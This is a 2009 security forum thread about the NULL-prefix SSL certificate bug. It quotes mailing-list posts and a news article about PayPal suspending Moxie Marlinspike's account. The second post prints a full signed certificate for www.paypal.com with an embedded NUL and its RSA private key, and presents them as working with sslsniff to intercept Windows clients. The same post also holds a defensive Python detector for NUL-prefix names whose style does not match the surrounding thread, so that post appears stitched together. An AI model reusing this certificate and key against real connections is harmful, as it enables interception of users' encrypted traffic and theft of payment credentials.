#1
10-03-2009, 10:43 AM
fnord0
NULL certificate CN=*\x00thoughtcrime.noisebridge.net (noisebridge-discuss)

found this quite interesting! figured this'd be of interest to the backtrack community

Quote:
[Noisebridge-discuss] Merry Certmas! CN=*\x00thoughtcrime.noisebridge.net
Jacob Appelbaum jacob at appelbaum.net
Tue Sep 29 22:51:33 PDT 2009

Hello *,

In the spirit of giving and sharing, I felt it would be nice to enable other Noisebridgers (and friends of Noisebridge) to play around with bugs in SSL/TLS.

Moxie was just over and we'd discussed releasing this certificate for some time. He's already released a few certificates and I thought I'd join him. In celebration of his visit to San Francisco, I wanted to release fun-times-at-moxie-marlinspike-high. This is a text file that contains a fully valid, signed certificate (with private key) that can be used to exploit the NULL certificate prefix bug[0]. The certificate is valid for * on the internet (when exploiting libnss software). The certificate is good for two years. It won't work for exploiting the bug for software written with the WIN32 api, they don't accept (for good reason) *! I suggest the use of Moxie's sslsniff[1] if you're so inclined to try network related testing. It may also be useful for testing code signing software.

It's been long enough that everyone should be patched for this awesome class of bugs. This certificate and corresponding private key should help people test fairly obscure software or software they've written themselves. I hope this release will help with confirmation of the bug and with regression testing. Feel free to use this certificate for anything relating to free software too. Consider it released into the public domain of interesting integers.

Enjoy!

Best,
Jacob

[0] http://thoughtcrime.org/papers/null-prefix-attacks.pdf
[1] Moxie Marlinspike >> software >> sslsniff
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: fun-times-at-moxie-marlinspike-high
Url: http://www.noisebridge.net/pipermail/noisebridge-discuss/attachments/20090929/64249b18/attachment.txt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 155 bytes
Desc: OpenPGP digital signature
Url : http://www.noisebridge.net/pipermail/noisebridge-discuss/attachments/20090929/64249b18/attachment.pgp
anyone played with this yet?
__________________
see the fnords
#2
10-06-2009, 04:52 PM
fnord0
more null-prefix certificates... this time for paypal (Full Disclosure)

here's another null-prefix certificate, this time for www.paypal.com - thanks goes to the Full Disclosure mailing list ;;

Quote:
null-prefix certificate for paypal

From: Tim Jones <timjonesowns () yahoo com>
Date: Mon, 5 Oct 2009 10:59:31 -0700 (PDT)

If there's really a Moxie Marlinspike fan club [1], I'm definitely a member.. Attached is one of the null-prefix certificates [2] that he distributed during his "intercepting secure communication" training at Black Hat. This one's for www.paypal.com, and since the Microsoft crypto api appears to remain unpatched, it works flawlessly with sslsniff [3] against all clients on Windows (IE, Chrome, Safari). Also, because of Moxie's attacks against OCSP [4], I don't think this certificate can be revoked.

Enjoy!

[1]: Linux Today - SSL trick certificate published
[2]: http://www.thoughtcrime.org/papers/n...ix-attacks.pdf
[3]: Moxie Marlinspike >> software >> sslsniff
[4]: http://www.thoughtcrime.org/papers/ocsp-attack.pdf

-----BEGIN CERTIFICATE-----
MIIGRDCCBa2gAwIBAgIDAPCbMA0GCSqGSIb3DQEBBQUAMIIBEjELMAkGA1UEBhMC
RVMxEjAQBgNVBAgTCUJhcmNlbG9uYTESMBAGA1UEBxMJQmFyY2Vsb25hMSkwJwYD
VQQKEyBJUFMgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgcy5sLjEuMCwGA1UEChQl
Z2VuZXJhbEBpcHNjYS5jb20gQy5JLkYuICBCLUI2MjIxMDY5NTEuMCwGA1UECxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEuMCwGA1UEAxMl
aXBzQ0EgQ0xBU0VBMSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTEgMB4GCSqGSIb3
DQEJARYRZ2VuZXJhbEBpcHNjYS5jb20wHhcNMDkwMjI0MjMwNDE3WhcNMTEwMjI0
MjMwNDE3WjCBlDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3JuaWExFjAU
BgNVBAcTDVNhbiBGcmFuY2lzY28xETAPBgNVBAoTCFNlY3VyaXR5MRQwEgYDVQQL
EwtTZWN1cmUgVW5pdDEvMC0GA1UEAxMmd3d3LnBheXBhbC5jb20Ac3NsLnNlY3Vy
ZWNvbm5lY3Rpb24uY2MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJp+m86
ALQhG8ixAtc/GbLEbbRU+IuKzNtywp48YLnGkT2Ct32Z/9EphMFzU5yC3fwkjHfV
QfPoHkKhrS2e/1sQJs6dVxdzFiM4yNbxuqOWWxZnSk9zlzpNFKT04j+LBYNC0dDc
L3rlthCyEcDcISqQ/66XcVpJgaxA8zu4WbJPAgMBAAGjggMhMIIDHTAJBgNVHRME
AjAAMBEGCWCGSAGG+EIBAQQEAwIGQDALBgNVHQ8EBAMCA/gwEwYDVR0lBAwwCgYI
KwYBBQUHAwEwHQYDVR0OBBYEFGGPYTRDVRR/JwnOTIvqm3sZJbxuMB8GA1UdIwQY
MBaAFA4HYNQ5yRtbXZB7I8jSNJ1KmkY5MAkGA1UdEQQCMAAwHAYDVR0SBBUwE4ER
Z2VuZXJhbEBpcHNjYS5jb20wcgYJYIZIAYb4QgENBGUWY09yZ2FuaXphdGlvbiBJ
bmZvcm1hdGlvbiBOT1QgVkFMSURBVEVELiBDTEFTRUExIFNlcnZlciBDZXJ0aWZp
Y2F0ZSBpc3N1ZWQgYnkgaHR0cHM6Ly93d3cuaXBzY2EuY29tLzAvBglghkgBhvhC
AQIEIhYgaHR0cHM6Ly93d3cuaXBzY2EuY29tL2lwc2NhMjAwMi8wQwYJYIZIAYb4
QgEEBDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAy
Q0xBU0VBMS5jcmwwRgYJYIZIAYb4QgEDBDkWN2h0dHBzOi8vd3d3Lmlwc2NhLmNv
bS9pcHNjYTIwMDIvcmV2b2NhdGlvbkNMQVNFQTEuaHRtbD8wQwYJYIZIAYb4QgEH
BDYWNGh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvcmVuZXdhbENMQVNF
QTEuaHRtbD8wQQYJYIZIAYb4QgEIBDQWMmh0dHBzOi8vd3d3Lmlwc2NhLmNvbS9p
cHNjYTIwMDIvcG9saWN5Q0xBU0VBMS5odG1sMIGDBgNVHR8EfDB6MDmgN6A1hjNo
dHRwOi8vd3d3Lmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBzY2EyMDAyQ0xBU0VBMS5j
cmwwPaA7oDmGN2h0dHA6Ly93d3diYWNrLmlwc2NhLmNvbS9pcHNjYTIwMDIvaXBz
Y2EyMDAyQ0xBU0VBMS5jcmwwMgYIKwYBBQUHAQEEJjAkMCIGCCsGAQUFBzABhhZo
dHRwOi8vb2NzcC5pcHNjYS5jb20vMA0GCSqGSIb3DQEBBQUAA4GBAGjueZeX3Tvv
FmoG8hSabs2eEveqgxC90XyY+seu1A4snjgFnVJgqZkKgbSYkB2uu0rXudyInjd4
QVv3gqXyukElWpAaHkU4oVJYdZQmRPsgB7pEzOVKLXI/mEf2JtwFRgUHYyGrRpuc
eNVUWz0MHshkjLVQI4Jv27giHEOWB6i7
-----END CERTIFICATE-----

-----BEGIN RSA PRIVATE KEY-----
MIICXQIBAAKBgQDSafpvOgC0IRvIsQLXPxmyxG20VPiLiszbcsKePGC5xpE9grd9
mf/RKYTBc1Ocgt38JIx31UHz6B5Coa0tnv9bECbOnVcXcxYjOMjW8bqjllsWZ0pP
c5c6TRSk9OI/iwWDQtHQ3C965bYQshHA3CEqkP+ul3FaSYGsQPM7uFmyTwIDAQAB
AoGAcqDnnOaVcYxD7Z55NLgckOYv+bj8ulCAb+DiI4AzFaIWh9MJkXRvCAy9VQI1
/6LPukhS+gmE55KBwb0AckUXSRC4DuPXOhgT6ywyEJGQp6IdaQmC4NoyC+G4GPnr
h0YISVKTT1ppRgjF6tpaFvElGTse+yejtKAssduT45MoxGkCQQDx58UFfPCVwAho
J7/4TXpEebYs/BuLKYwQKUuQe1B+dV2WtSaub+jbSSpRVScTpyfKRwN0w4UZzs/6
4Zzs/erbAkEA3qx8uhMy7Dxu8zWx+C1b5LSh4Rf4sCvXug/nx3opvahO89iP5P6L
MVplaVsVPwligUEaMsx9rJEJvt48sMEenQJBAOQlE6MOZ5TETOl2e84BvEuygodA
qfWAlLF1UOgN9SefJ0oIxVeFAhc2lOuqJLWbU6KpgO/xqqlhbLOPbsHw5DsCQDj0
j5acsIrCTnLBCjt7hqSyGzHTCtYs8KnzxYo9Ug3jzgYLH4soHHxMLeJL3NxZzytW
dpgFvCN2mbKLb6SaUPUCQQCKjbXoN7DkBbk8wU0ZY5fGCtLEUHtEmT93nFgmUvQ3
ZSB/EvhtWRPcWGdRC5tj0YxaUFevVhZA/Ng1d1JzbcKB
-----END RSA PRIVATE KEY-----

Last edited by fnord0; 10-06-2009 at 05:00 PM. Reason: fixed spelling mistakes
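The bug both quoted mails rely on comes down to how a client compares the certificate's CN against the hostname: the CA validated ownership of the domain after the NUL and issued the certificate, while a C-string comparison in the client stops at the first NUL and sees only the part before it. The following Python is an added example written for this thread, not code from either mailing-list post, from Moxie's papers or from sslsniff. It walks a DER certificate with a small hand-written decoder to pull out the subject Name, extracts every CN as raw bytes, and reports whether a NUL byte is present and what a strlen()-style check would have seen versus a length-aware comparison. The CN value www.paypal.com\x00ssl.secureconnection.cc is the one encoded in the certificate posted above; the certificate skeleton the demo wraps around it is constructed here, unsigned, and exists only so the code runs offline.

```python
"""Detect NUL-prefix common names in X.509 subjects (pure Python, no third-party deps).

Added example for this thread; the CN with the embedded NUL is the one carried by the
certificate posted above, the surrounding certificate skeleton is constructed and unsigned.
"""

OID_COMMON_NAME = bytes.fromhex("550403")  # id-at-commonName, 2.5.4.3


def _tlv(tag, body):
    """DER-encode one tag/length/value, using long-form length when needed."""
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def _children(buf):
    """Split a DER blob into its top-level elements: [(tag, value, raw_tlv), ...]."""
    out, pos = [], 0
    while pos < len(buf):
        start = pos
        tag, length, pos = buf[pos], buf[pos + 1], pos + 2
        if length & 0x80:  # long-form length: low bits give the number of length bytes
            n = length & 0x7F
            length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
        out.append((tag, buf[pos:pos + length], buf[start:pos + length]))
        pos += length
    return out


def encode_name(cn):
    """DER Name with a single CN: SEQUENCE { SET { SEQUENCE { OID, PrintableString } } }.

    A NUL is not a legal PrintableString character; this encoder does not enforce that,
    which is exactly what lets the sample certificate carry one."""
    atv = _tlv(0x30, _tlv(0x06, OID_COMMON_NAME) + _tlv(0x13, cn))
    return _tlv(0x30, _tlv(0x31, atv))


def build_test_cert(cn):
    """Constructed, unsigned Certificate skeleton with the given subject CN (never validates)."""
    sig_alg = _tlv(0x30, _tlv(0x06, bytes.fromhex("2a864886f70d010105")) + b"\x05\x00")
    tbs = (_tlv(0xA0, _tlv(0x02, b"\x02"))  # [0] EXPLICIT version v3
           + _tlv(0x02, b"\x01")  # serialNumber (constructed value)
           + sig_alg
           + encode_name(b"Example CA")  # issuer (constructed value)
           + _tlv(0x30, _tlv(0x17, b"090224230417Z") + _tlv(0x17, b"110224230417Z"))
           + encode_name(cn)  # subject
           + _tlv(0x30, b""))  # subjectPublicKeyInfo placeholder, never inspected
    return _tlv(0x30, _tlv(0x30, tbs) + sig_alg + _tlv(0x03, b"\x00"))


def subject_der(cert_der):
    """Return the raw DER Name of the subject (TBSCertificate element 5, or 4 without version)."""
    cert_body = _children(cert_der)[0][1]  # Certificate ::= SEQUENCE { tbs, sigAlg, sig }
    tbs_body = _children(cert_body)[0][1]  # TBSCertificate ::= SEQUENCE { ... }
    fields = _children(tbs_body)
    i = 1 if fields[0][0] == 0xA0 else 0  # optional [0] version shifts everything by one
    return fields[i + 4][2]  # serial, sigAlg, issuer, validity, subject


def common_names(name_der):
    """Every CN value in a DER Name, kept as bytes so an embedded NUL survives intact."""
    cns = []
    for _, rdn_set, _ in _children(_children(name_der)[0][1]):
        for _, atv, _ in _children(rdn_set):
            (_, oid, _), (_, value, _) = _children(atv)
            if oid == OID_COMMON_NAME:
                cns.append(value)
    return cns


def c_string_view(value):
    """What a strlen()-based hostname check sees: only the bytes before the first NUL."""
    return value.split(b"\x00", 1)[0].decode("latin-1")


def audit_certificate(cert_der, expected_host):
    """Return (matches_as_c_string, matches_length_aware, nul_present) for the first CN."""
    cn = common_names(subject_der(cert_der))[0]
    return (c_string_view(cn) == expected_host,
            cn.decode("latin-1") == expected_host,
            b"\x00" in cn)


if __name__ == "__main__":
    for cn in (b"www.paypal.com", b"www.paypal.com\x00ssl.secureconnection.cc"):
        print(cn, "->", audit_certificate(build_test_cert(cn), "www.paypal.com"))
```

For the NUL-prefix CN the audit returns (True, False, True): a C-string comparison accepts it as www.paypal.com, a length-aware comparison does not, and the NUL check flags it on its own. The length-aware comparison is the fix that libnss and the other affected stacks shipped; rejecting a NUL inside a PrintableString at the DER decoder is an independent second line of defence, since the encoding never allowed it in the first place.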
#3
10-07-2009, 09:39 AM
Nick_the_Greek

Very interesting!
#4
10-07-2009, 04:59 PM
fnord0

well, this is lame... I am posting the below story in reference to the above www.paypal.com null cert ;;

Quote:
Man banished from PayPal for showing how to hack PayPal

Some hacking tools more equal than others
By Dan Goodin in San Francisco
Posted in Security, 6th October 2009 23:03 GMT

PayPal suspended the account of a white-hat hacker on Tuesday, a day after someone used his research into website authentication to publish a counterfeit certificate for the online payment processor.

"Under the Acceptable Use Policy, PayPal may not be used to send or receive payments for items that show the personal information of third parties in violation of applicable law," company representatives wrote in an email sent to the hacker, Moxie Marlinspike. "Please understand that this is a security measure meant to help protect you and your account. We apologize for any inconvenience."

The email, sent from an unmonitored PayPal address, makes no mention of the item that violates the PayPal policy. The suspension effectively freezes more than $500 in the account until Marlinspike submits a signed affidavit swearing he has removed the PayPal logos from his site.

Since 2002, Marlinspike has included a yellow donate button on the download page for a hacking tool he calls SSLSniff, and more recently he released a program called SSLStrip, which also includes the button. But it was only after someone published a counterfeit SSL certificate on Monday that PayPal took action against the account.

"This is not something I had anything to do with, and they responded by suspending my account," Marlinspike told The Reg. "I've been the one trying to warn them of this in the first place."

The account suspension is troubling because it penalizes an independent security researcher whose discoveries have already yielded important insights into secure sockets layer, one of the web's oldest and most relied upon measures for preventing man-in-the-middle attacks. It's the latest action to demonize hacker tools that can be used by security professionals for good because they can also be used by criminals for bad.

It also flies in the face of the tacit approval PayPal and its parent company, eBay, give to groups distributing dozens of other hacking tools. No doubt, the Wireshark packet sniffer is used regularly to reveal the passwords of unsuspecting victims, and yet its purveyors accept payments by PayPal. The same goes for the Cain & Abel and l0phtcrack password recovery tools and Remote-Exploit.org, a group whose tag line reads: "Supplying offensive security products to the world."

A PayPal spokeswoman said the company's privacy policy prevented her from discussing Marlinspike's case. But in general, she said hacking tools are allowed in certain cases, such as when they can be used to legitimately help administrators assess the strength of user passwords.

"We do not, however, allow PayPal to be used in the sale or dissemination of tools which have the sole purpose to attack customers and illegally obtain individual customer information," the spokeswoman, Sara Gorman, wrote in an email. "We consider whether there is any legitimate use in helping to strengthen the defenses of one's site when determining violation of our policy."

She said PayPal relies on a dedicated team with "extensive experience in information security, law enforcement, financial services and risk" to make such decisions. She didn't explain how they determined programs such as Wireshark and Cain & Abel have legitimate uses and the tools offered by Marlinspike do not. She also didn't explain why Marlinspike's banishment came less than 24 hours after the release of the bogus PayPal certificate.

According to a note included with the certificate's release, Marlinspike distributed it during a training session at the Black Hat security conference in July. The hacker confirms he offered a class to penetration testers that taught them everything they'd need to test and carry out attacks on SSL certificates, and as part of that, he included a proof-of-concept certificate. But he never distributed the certificate and each student signed an agreement stating the material was for evaluation purposes and was not to be publicly released, he said.

And in any event, he never used PayPal to accept payment for the class. What's more, the only items being distributed on the PayPal-adorned pages are SSLStrip and SSLSniff. Bogus certificates were never available anywhere on the site, he said.

So if you're a hacker who relies on PayPal, the not-so-subtle message is to make sure your projects steer clear of your online payment processor. It doesn't matter that you speak at the same conferences attended by the rest of the security world. As PayPal well knows, hacker tools can be used for good or for bad, and the company has the sole discretion to choose which is which.
notice there how remote-exploit.org got a plug
anyways, pretty lame.... bad paypal, bad!

Last edited by fnord0; 10-11-2009 at 04:54 AM.